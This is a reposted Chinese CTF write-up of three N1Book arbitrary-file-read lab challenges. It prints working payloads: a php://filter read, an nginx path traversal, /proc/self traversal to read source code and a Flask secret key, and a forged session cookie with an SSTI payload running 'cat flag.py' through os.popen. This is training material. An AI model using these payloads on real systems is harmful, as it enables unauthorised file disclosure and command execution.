当前位置：首页 > news >正文

CTFer成长之路之任意文件读取漏洞

news 文章来源：https://blog.csdn.net/weixin_48899364/article/details/129143187 2025/5/26 6:36:31

任意文件读取漏洞CTF

任意文件读取漏洞

afr_1

题目描述:

暂无

docker-compose.yml

version: '3.2'services:web:image: registry.cn-hangzhou.aliyuncs.com/n1book/web-file-read-1:latestports:- 80:80

启动方式

docker-compose up -d

题目Flag

n1book{afr_1_solved}

Writeup

访问url：http://192.168.10.22/?p=hello

在这里插入图片描述

本题是考查任意文件读取，利用php://协议，访问

http://192.168.10.22/?p=php://filter/convert.base64-encode/resource=flag

在这里插入图片描述

将得到的数据进行base64解码，得到flag：n1book{afr_1_solved}

在这里插入图片描述

afr_2

题目描述:

暂无

docker-compose.yml

version: '3.2'services:web:image: registry.cn-hangzhou.aliyuncs.com/n1book/web-file-read-2:latestports:- 80:80

启动方式

docker-compose up -d

题目Flag

n1book{afr_2_solved}

Writeup

访问url：http://192.168.10.22/

在这里插入图片描述

本题是考查任意文件读取，访问 http://IP:PORT/img…/即可访问目录为/的文件（nginx错误配置）

访问url： http://192.168.10.22/img…/

在这里插入图片描述

即可得到目录文件，访问url：192.168.10.22/img…/flag

即可得到flag：n1book{afr_2_solved}

在这里插入图片描述

afr_3

题目描述:

暂无

docker-compose.yml

version: '3.2'services:web:image: registry.cn-hangzhou.aliyuncs.com/n1book/web-file-read-3:latestports:- 5000:5000

启动方式

docker-compose up -d

题目Flag

n1book{afr_3_solved}

Writeup

本题考查对linux系统中/proc/目录下文件作用的了解，同时考查了flask模板注入

访问url：http://192.168.10.22:5000/

在这里插入图片描述

输入ifconfig进行查询

在这里插入图片描述

继续点击article

在这里插入图片描述

请求http://192.168.10.22:5000/article?name=…/…/…/…/…/proc/self/cmdline获取当前执行系统命令，得到python server.py

在这里插入图片描述

请求 http://192.168.10.22:5000/article?name=…/…/…/…/…/proc/self/cwd/server.py获取源码

在这里插入图片描述

审计源码，发现flag在flag.py,flask的appkey在key.py,但是此处任意文件读取漏洞被过滤了关键词flag

源码里存在flask SSTI，前提是可以伪造flask的cookie，这里需要用到appkey https://noraj.github.io/flask-session-cookie-manager/

@app.route("/n1page", methods=["GET", "POST"])
def n1page():if request.method != "POST":return redirect(url_for("index"))n1code = request.form.get("n1code") or Noneif n1code is not None:n1code = n1code.replace(".", "").replace("_", "").replace("{","").replace("}","")if "n1code" not in session or session['n1code'] is None:session['n1code'] = n1codetemplate = Noneif session['n1code'] is not None:'''这里存在SSTI'''template = '''<h1>N1 Page</h1> <div class="row> <div class="col-md-6 col-md-offset-3 center"> Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>? </div> </div> ''' % session['n1code']session['n1code'] = Nonereturn render_template_string(template)

所以请求

http://192.168.10.22:5000/article?name=…/…/…/…/…/proc/self/cwd/key.py

获取appkey

#!/usr/bin/python key = ‘Drmhze6EPcv0fN_81Bj-nA’

在这里插入图片描述

伪造cookie为SSTI的payload获取flag.

{{''.__class__.__mro__[2].__subclasses__()[40]('flag.py').read()}}

得到cookie的值为

eyJuMWNvZGUiOm51bGx9.YB5YLg.zvCvxG173uppSx0eYLBbzVdYKSk

在这里插入图片描述

安装Flask Session Cookie Decoder/Encoder

git clone https://github.com/noraj/flask-session-cookie-manager.git && cd flask-session-cookie-manager

Decode

python3 flask_session_cookie_manager3.py decode -c ‘eyJuMWNvZGUiOm51bGx9.YB5YLg.zvCvxG173uppSx0eYLBbzVdYKSk’ -s ‘Drmhze6EPcv0fN_81Bj-nA’

得到{‘n1code’: None}

在这里插入图片描述

如图所示方式进行加密

python3 flask_session_cookie_manager3.py encode -s "Drmhze6EPcv0fN_81Bj-nA" -t "{'n1code': '{{\'\'.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[\'os\'].popen(\'cat flag.py\').read()}}'}"

得到加密后的cookie：

.eJwdikEKgCAQAL8SXlYvQl2CviKxbGoRmCtZhxD_nnUbZqaI2Ft2XkyiFACNaAPljNjoOBnRDHPDfC-_961IZcb-k3vcr3_cAi8UWjLAGWadOPkowdLVrYE2nR5Q-vTkpKpV1BcrHygP.Ev_wtA.71mFW-T5axswqE7F-u3jPywUWR4

在这里插入图片描述

修改session

在这里插入图片描述

获得flag：n1book{afr_3_solved}

在这里插入图片描述

文笔生疏，措辞浅薄，望各位大佬不吝赐教，万分感谢。

免责声明：由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。

博客:
https://rdyx0.github.io/先知社区：
https://xz.aliyun.com/u/37846SecIN:
https://www.sec-in.com/author/3097CSDN:
https://blog.csdn.net/weixin_48899364?type=blog公众号：
https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirectFreeBuf：
https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85

CTFer成长之路之任意文件读取漏洞

任意文件读取漏洞CTF

afr_1

afr_2

afr_3

相关文章：

CTFer成长之路之任意文件读取漏洞

制造企业为何要上数字化工厂系统？

Facebook广告投放的正确姿势：玩转目标定位

思科C9115AXI-H型号AP上线C9800失败处理记录

WSO2通过设定Role来订阅对应的Api

使用 PyTorch+LSTM 进行单变量时间序列预测（附完整源码）

操作系统（day12）-- 虚拟内存；页面分配策略

Git commit 提交没有被远端分支合并，撤销本次commit

Netty核心原理（线程模型、核心API）与入门案例详解

【 java 8】Lambda 表达式

改进YOLO系列 | 谷歌团队 | CondConv:用于高效推理的条件参数化卷积

SQL高级 --优化

【C++】空间配置器

nginx的介绍及源码安装

通过openssl生成pfx证书

华为OD机试真题Python实现【敏感字段加密】真题+解题思路+代码（20222023）

我的 System Verilog 学习记录（1）

金三银四，我不允许你们不知道这些软件测试面试题

【UnityEditor】Unity将Multiple Sprite分割成多张png小图

独立搭建 handle server

记一次KindEditor表格修改无效问题

一种图片展示的完美方案，图片展示，object-fill

社科院杜兰金融管理硕士——考研初试成绩已出，关于分数“6线”你有了解吗

Talk | 清华大学交叉信息研究院助理教授杜韬：利用计算方法探究流固耦合

2023年，智能家居实体门店如何选品？

数据分析-深度学习 NLP Day2关键词提取案例

LeetCode题解：938. 二叉搜索树的范围和，BFS，JavaScript，详细注释

istio初步了解

【模板】用HTML编写邮件正文 | 各大邮箱几乎都会过滤css样式、js脚本等效果，如何用基础HTML编写？

华为云计算之双活容灾